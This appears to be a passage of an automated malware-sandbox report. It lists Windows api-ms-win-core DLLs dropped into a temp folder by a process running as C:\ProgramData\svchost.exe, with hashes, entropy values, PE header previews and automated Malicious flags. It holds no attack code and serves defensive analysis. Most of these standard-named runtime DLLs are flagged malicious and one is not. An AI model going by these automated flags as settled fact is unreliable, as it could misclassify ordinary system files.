                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):22120
                                                                                                                                                          Entropy (8bit):4.615608208407289
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:4TGaWhhWMWvkJ0f5AbVWQ4cRWhW9qUd9ZnAOVX01k9z3AAcoXXcX:4qaWhhWIaablbR31AqR9z77MX
                                                                                                                                                          MD5:BCB8B9F6606D4094270B6D9B2ED92139
                                                                                                                                                          SHA1:BD55E985DB649EADCB444857BEED397362A2BA7B
                                                                                                                                                          SHA-256:FA18D63A117153E2ACE5400ED89B0806E96F0627D9DB935906BE9294A3038118
                                                                                                                                                          SHA-512:869B2B38FD528B033B3EC17A4144D818E42242B83D7BE48E2E6DA6992111758B302F48F52E0DD76BECB526A90A2B040CE143C6D4F0E009A513017F06B9A8F2B9
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....RS.........." .........0...............................................@............`A........................................p...L............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-file-l2-1-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):18696
                                                                                                                                                          Entropy (8bit):7.054510010549814
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:eVrW1hWbvm0GftpBjzH4m3S9gTlUK3dsl:eVuAViaB/6sl
                                                                                                                                                          MD5:BFFFA7117FD9B1622C66D949BAC3F1D7
                                                                                                                                                          SHA1:402B7B8F8DCFD321B1D12FC85A1EE5137A5569B2
                                                                                                                                                          SHA-256:1EA267A2E6284F17DD548C6F2285E19F7EDB15D6E737A55391140CE5CB95225E
                                                                                                                                                          SHA-512:B319CC7B436B1BE165CDF6FFCAB8A87FE29DE78F7E0B14C8F562BE160481FB5483289BD5956FDC1D8660DA7A3F86D8EEDE35C6CC2B7C3D4C852DECF4B2DCDB7F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d...4.F>.........." .........................................................0............`.........................................`................ ...................=..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-handle-l1-1-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):22128
                                                                                                                                                          Entropy (8bit):4.625038284904601
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:9jWhhWmWGxVA6VWQ4cRWMj656CqRqNX01k9z3A8oXblIHNQ:9jWhhWSxdlE5DNR9zrG6Ha
                                                                                                                                                          MD5:D584C1E0F0A0B568FCE0EFD728255515
                                                                                                                                                          SHA1:2E5CE6D4655C391F2B2F24FC207FDF0E6CD0CC2A
                                                                                                                                                          SHA-256:3DE40A35254E3E0E0C6DB162155D5E79768A6664B33466BF603516F3743EFB18
                                                                                                                                                          SHA-512:C7D1489BF81E552C022493BB5A3CD95CCC81DBEDAAA8FDC0048CACBD087913F90B366EEB4BF72BF4A56923541D978B80D7691D96DBBC845625F102C271072C42
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....Hb..........." .........0...............................................@............`A........................................p...`............0...............0..p&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-heap-l1-1-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):22120
                                                                                                                                                          Entropy (8bit):4.723757189784349
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:bdxlxWhhWWWvkJ0f5AbVWQ4cRWKmX56CqRqNX01k9z3A8oXjl:bdxlxWhhW2aablm5DNR9zrG
                                                                                                                                                          MD5:6168023BDB7A9DDC69042BEECADBE811
                                                                                                                                                          SHA1:54EE35ABAE5173F7DC6DAFC143AE329E79EC4B70
                                                                                                                                                          SHA-256:4EA8399DEBE9D3AE00559D82BC99E4E26F310934D3FD1D1F61177342CF526062
                                                                                                                                                          SHA-512:F1016797F42403BB204D4B15D75D25091C5A0AB8389061420E1E126D2214190A08F02E2862A2AE564770397E677B5BCDD2779AB948E6A3E639AA77B94D0B3F6C
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....B.l.........." .........0...............................................@......).....`A........................................p................0...............0..h&..............p............................................................................rdata..|...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-interlocked-l1-1-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):22120
                                                                                                                                                          Entropy (8bit):4.654830959351148
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:r4WhhWWsWvkJ0f5AbVWQ4cRWsQOZD2X01k9z3AG2hqvz:0WhhWRaablKZR9zVQM
                                                                                                                                                          MD5:4F631924E3F102301DAC36B514BE7666
                                                                                                                                                          SHA1:B3740A0ACDAF3FBA60505A135B903E88ACB48279
                                                                                                                                                          SHA-256:E2406077621DCE39984DA779F4D436C534A31C5E863DB1F65DE5939D962157AF
                                                                                                                                                          SHA-512:56F9FB629675525CBE84A29D44105B9587A9359663085B62F3FBE3EEA66451DA829B1B6F888606BC79754B6B814CA4A1B215F04F301EFE4DB0D969187D6F76F1
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...}.o..........." .........0...............................................@......x.....`A........................................p................0...............0..h&..............p............................................................................rdata..L...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-libraryloader-l1-1-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):22120
                                                                                                                                                          Entropy (8bit):4.868673796157719
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:oTvuBL3BBLIWhhW5WvkJ0f5AbVWQ4cRWsmIngqtVVwX01k9z3Acqk3:oTvuBL3BaWhhWhaablkqVwR9zHR
                                                                                                                                                          MD5:8DFC224C610DD47C6EC95E80068B40C5
                                                                                                                                                          SHA1:178356B790759DC9908835E567EDFB67420FBAAC
                                                                                                                                                          SHA-256:7B8C7E09030DF8CDC899B9162452105F8BAEB03CA847E552A57F7C81197762F2
                                                                                                                                                          SHA-512:FE5BE81BFCE4A0442DD1901721F36B1E2EFCDCEE1FDD31D7612AD5676E6C5AE5E23E9A96B2789CB42B7B26E813347F0C02614937C561016F1563F0887E69BBEE
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....g..........." .........0...............................................@......fK....`A........................................p................0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-localization-l1-2-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):22128
                                                                                                                                                          Entropy (8bit):5.357912030694384
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:jnaOMw3zdp3bwjGzue9/0jCRrndbnWhhWRxdlF5DNR9zrGDLC:mOMwBprwjGzue9/0jCRrndbemr9zay
                                                                                                                                                          MD5:20DDF543A1ABE7AEE845DE1EC1D3AA8E
                                                                                                                                                          SHA1:0EAF5DE57369E1DB7F275A2FFFD2D2C9E5AF65BF
                                                                                                                                                          SHA-256:D045A72C3E4D21165E9372F76B44FF116446C1E0C221D9CEA3AB0A1134A310E8
                                                                                                                                                          SHA-512:96DD48DF315A7EEA280CA3DA0965A937A649EE77A82A1049E3D09B234439F7D927D7FB749073D7AF1B23DADB643978B70DCDADC6C503FE850B512B0C9C1C78DD
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...0.&3.........." .........0...............................................@............`A........................................p................0...............0..p&..............p............................................................................rdata..D...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-memory-l1-1-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):22120
                                                                                                                                                          Entropy (8bit):4.755674101565431
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:q8WhhWUWvkJ0f5AbVWQ4cRW9RvBwUoX01k9z3AuJGzx:q8WhhWgaablSUR9zxk
                                                                                                                                                          MD5:C4098D0E952519161F4FD4846EC2B7FC
                                                                                                                                                          SHA1:8138CA7EB3015FC617620F05530E4D939CAFBD77
                                                                                                                                                          SHA-256:51B2103E0576B790D5F5FDACB42AF5DAC357F1FD37AFBAAF4C462241C90694B4
                                                                                                                                                          SHA-512:95AA4C7071BC3E3FA4DB80742F587A0B80A452415C816003E894D2582832CF6EAC645A26408145245D4DEABE71F00ECCF6ADB38867206BEDD5AA0A6413D241F5
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...`.@f.........." .........0...............................................@......E.....`A........................................p...l............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-namedpipe-l1-1-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):22128
                                                                                                                                                          Entropy (8bit):4.706939855964842
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:vyWhhWQWGxVA6VWQ4cRWzco456CqRqNX01k9z3A8oXdlxG:KWhhWoxdlvo45DNR9zrGhG
                                                                                                                                                          MD5:EAF36A1EAD954DE087C5AA7AC4B4ADAD
                                                                                                                                                          SHA1:9DD6BC47E60EF90794A57C3A84967B3062F73C3C
                                                                                                                                                          SHA-256:CDBA9DC9AF63EBD38301A2E7E52391343EFEB54349FC2D9B4EE7B6BF4F9CF6EB
                                                                                                                                                          SHA-512:1AF9E60BF5C186CED5877A7FA690D9690B854FAA7E6B87B0365521EAFB7497FB7370AC023DB344A6A92DB2544B5BDC6E2744C03B10C286EBBF4F57C6CA3722CF
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...j............" .........0...............................................@.......Y....`A........................................p................0...............0..p&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-processenvironment-l1-1-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):22120
                                                                                                                                                          Entropy (8bit):4.879924502333097
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:nEFPmWhhWiWvkJ0f5AbVWQ4cRWdEnZBwUoX01k9z3AuJGzCM:EFuWhhW6aablNZUR9zx
                                                                                                                                                          MD5:8711E4075FA47880A2CB2BB3013B801A
                                                                                                                                                          SHA1:B7CEEC13E3D943F26DEF4C8A93935315C8BB1AC3
                                                                                                                                                          SHA-256:5BCC3A2D7D651BB1ECC41AA8CD171B5F2B634745E58A8503B702E43AEE7CD8C6
                                                                                                                                                          SHA-512:7370E4ACB298B2E690CCD234BD6C95E81A5B870AE225BC0AD8FA80F4473A85E44ACC6159502085FE664075AFA940CFF3DE8363304B66A193AC970CED1BA60AAE
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...L.Y..........." .........0...............................................@...........`A........................................p...H............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-processthreads-l1-1-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):22120
                                                                                                                                                          Entropy (8bit):5.227317911828185
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:Lck1JzNcKSI8WhhWCaabl5ujezWSR9zchTL:TcKS+Hznwq9zS
                                                                                                                                                          MD5:8E6EB11588FA9625B68960A46A9B1391
                                                                                                                                                          SHA1:FF81F0B3562E846194D330FADF2AB12872BE8245
                                                                                                                                                          SHA-256:AE56E19DA96204E7A9CDC0000F96A7EF15086A9FE1F686687CB2D6FBCB037CD6
                                                                                                                                                          SHA-512:FDB97D1367852403245FC82CB1467942105E4D9DB0DE7CF13A73658905139BB9AE961044BEB0A0870429A1E26FE00FC922FBD823BD43F30F825863CAD2C22CEA
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....O.j.........." .........0...............................................@......=M....`A........................................p................0...............0..h&..............p............................................................................rdata..d...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-processthreads-l1-1-1.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):22120
                                                                                                                                                          Entropy (8bit):4.788678681522991
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:fkDfIecWhhW/WvkJ0f5AbVWQ4cRWSXgp13s5yX01k9z3A3MLGO:fkDfIecWhhWLaabl4cYR9zEM3
                                                                                                                                                          MD5:4380D56A3B83CA19EA269747C9B8302B
                                                                                                                                                          SHA1:0C4427F6F0F367D180D37FC10ECBE6534EF6469C
                                                                                                                                                          SHA-256:A79C7F86462D8AB8A7B73A3F9E469514F57F9FE456326BE3727352B092B6B14A
                                                                                                                                                          SHA-512:1C29C335C55F5F896526C8EE0F7160211FD457C1F1B98915BCC141112F8A730E1A92391AB96688CBB7287E81E6814CC86E3B057E0A6129CBB02892108BFAFAF4
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....#..........." .........0...............................................@............`A........................................p................0...............0..h&..............p............................................................................rdata..\...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-profile-l1-1-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):22120
                                                                                                                                                          Entropy (8bit):4.583429497884519
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:SWhhWpWvkJ0f5AbVWQ4cRWlwbx56CqRqNX01k9z3A8oXnlSP:SWhhWRaablbN5DNR9zrGQ
                                                                                                                                                          MD5:9082D23943B0AA48D6AF804A2F3609A2
                                                                                                                                                          SHA1:C11B4E12B743E260E8B3C22C9FACE83653D02EFE
                                                                                                                                                          SHA-256:7ECC2E3FE61F9166FF53C28D7CB172A243D94C148D3EF13545BC077748F39267
                                                                                                                                                          SHA-512:88434A2B996ED156D5EFFBB7960B10401831E9B2C9421A0029D2D8FA651B9411F973E988565221894633E9FFCD6512F687AFBB302EFE2273D4D1282335EE361D
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d......e.........." .........0...............................................@............`A........................................p................0...............0..h&..............p............................................................................rdata..P...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-rtlsupport-l1-1-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):22112
                                                                                                                                                          Entropy (8bit):4.750751888281197
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:xGeVvWhhWN6WvkJ0f5AbVWQ4OW7bplZD2X01k9z3AG2LzS4:xGeVvWhhWNCaab2pyR9zV2zS4
                                                                                                                                                          MD5:772F1B596A7338F8EA9DDFF9ABA9447D
                                                                                                                                                          SHA1:CDA9F4B9808E9CEF2AEAC2AC6E7CDF0E8687C4C5
                                                                                                                                                          SHA-256:CC1BFCE8FE6F9973CCA15D7DFCF339918538C629E6524F10F1931AE8E1CD63B4
                                                                                                                                                          SHA-512:8C94890C8F0E0A8E716C777431022C2F77B69EBFAA495D541E2D3312AE1DA307361D172EFCE94590963D17FE3FCAC8599DCABE32AB56E01B4D9CF9B4F0478277
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d......Z.........." .........0...............................................@......7.....`A........................................p...<............0...............0..`&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-string-l1-1-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):22128
                                                                                                                                                          Entropy (8bit):4.664471809242636
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:7ZyMvrRWhhW8WGxVA6VWQ4cRWquEg56CqRqNX01k9z3A8oXW98laI:7ZyMvdWhhW8xdlq5DNR9zrG2o
                                                                                                                                                          MD5:84B1347E681E7C8883C3DC0069D6D6FA
                                                                                                                                                          SHA1:9E62148A2368724CA68DFA5D146A7B95C710C2F2
                                                                                                                                                          SHA-256:1CB48031891B967E2F93FDD416B0324D481ABDE3838198E76BC2D0CA99C4FD09
                                                                                                                                                          SHA-512:093097A49080AEC187500E2A9E9C8CCD01F134A3D8DC8AB982E9981B9DE400DAE657222C20FB250368ECDDC73B764B2F4453AB84756B908FCB16DF690D3F4479
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....I..........." .........0...............................................@.......t....`A........................................p................0...............0..p&..............p............................................................................rdata..l...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-synch-l1-1-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):22120
                                                                                                                                                          Entropy (8bit):5.1446624716472735
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:xEwidv3V0dfpkXc0vVaCUWhhWHaablKR9zVR:aHdv3VqpkXc0vVa4qzE9z
                                                                                                                                                          MD5:6EA31229D13A2A4B723D446F4242425B
                                                                                                                                                          SHA1:036E888B35281E73B89DA1B0807EA8E89B139791
                                                                                                                                                          SHA-256:8ECCABA9321DF69182EE3FDB8FC7D0E7615AE9AD3B8CA53806ED47F4867395AE
                                                                                                                                                          SHA-512:FA834E0E54F65D9A42AD1F4FB1086D26EDFA182C069B81CFF514FEB13CFCB7CB5876508F1289EFBC2D413B1047D20BAB93CED3E5830BF4A6BB85468DECD87CB6
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....x.........." .........0...............................................@......zM....`A........................................p...X............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-synch-l1-2-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):22120
                                                                                                                                                          Entropy (8bit):4.827260305412209
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:ptZ3pWhhWpaWvkJ0f5AbVWQ4cRWTjPtngqtVVwX01k9z3AcVj:ptZ3pWhhWEaablmrVwR9zHp
                                                                                                                                                          MD5:DD6F223B4F9B84C6E9B2A7CF49B84FC7
                                                                                                                                                          SHA1:2EE75D635D21D628E8083346246709A71B085710
                                                                                                                                                          SHA-256:8356F71C5526808AF2896B2D296CE14E812E4585F4D0C50D7648BC851B598BEF
                                                                                                                                                          SHA-512:9C12912DAEA5549A3477BAA2CD05180702CF24DD185BE9F1FCA636DB6FBD25950C8C2B83F18D093845D9283C982C0255D6402E3CDEA0907590838E0ACB8CC8C1
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d................." .........0...............................................@.......c....`A........................................p...x............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-sysinfo-l1-1-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):22128
                                                                                                                                                          Entropy (8bit):4.913093601910681
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:yaIMFSgWhhW5JWGxVA6VWQ4cRWpRTJz56CqRqNX01k9z3A8oX/ld:ydgWhhW/xdlATh5DNR9zrGP
                                                                                                                                                          MD5:9CA65D4FE9B76374B08C4A0A12DB8D2F
                                                                                                                                                          SHA1:A8550D6D04DA33BAA7D88AF0B4472BA28E14E0AF
                                                                                                                                                          SHA-256:8A1E56BD740806777BC467579BDC070BCB4D1798DF6A2460B9FE36F1592189B8
                                                                                                                                                          SHA-512:19E0D2065F1CA0142B26B1F5EFDD55F874F7DDE7B5712DD9DFD4988A24E2FCD20D4934BDDA1C2D04B95E253AA1BEE7F1E7809672D7825CD741D0F6480787F3B3
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...~.l-.........." .........0...............................................@............`A........................................p................0...............0..p&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-timezone-l1-1-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):22120
                                                                                                                                                          Entropy (8bit):4.818883643812602
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:MNBWhhWXWvkJ0f5AbVWQ4cRWysu56CqRqNX01k9z3A8oXPl1D:MXWhhWzaablb5DNR9zrGnD
                                                                                                                                                          MD5:2554060F26E548A089CAB427990AACDF
                                                                                                                                                          SHA1:8CC7A44A16D6B0A6B7ED444E68990FF296D712FE
                                                                                                                                                          SHA-256:5AB003E899270B04ABC7F67BE953EACCF980D5BBE80904C47F9AAF5D401BB044
                                                                                                                                                          SHA-512:FD4D5A7FE4DA77B0222B040DC38E53F48F7A3379F69E2199639B9F330B2E55939D89CE8361D2135182B607AD75E58EE8E34B90225143927B15DCC116B994C506
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...>.os.........." .........0...............................................@......JH....`A........................................p...H............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-util-l1-1-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):22120
                                                                                                                                                          Entropy (8bit):4.599642754410154
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:5WhhWqMWvkJ0f5AbVWQ4cRWHLlDrwLobDX01k9z3AU93mldvQ:5WhhWqIaablklDMyDR9z/93mldvQ
                                                                                                                                                          MD5:427F0E19148D98012968564E4B7E622A
                                                                                                                                                          SHA1:488873EB98133E20ACD106B39F99E3EBDFACA386
                                                                                                                                                          SHA-256:0CBACACCEDAF9B6921E6C1346DE4C0B80B4607DACB0F7E306A94C2F15FA6D63D
                                                                                                                                                          SHA-512:03FA49BDADB65B65EFED5C58107912E8D1FCCFA13E9ADC9DF4441E482D4B0EDD6FA1BD8C8739CE09654B9D6A176E749A400418F01D83E7AE50FA6114D6AEAD2B
                                                                                                                                                          Malicious:true
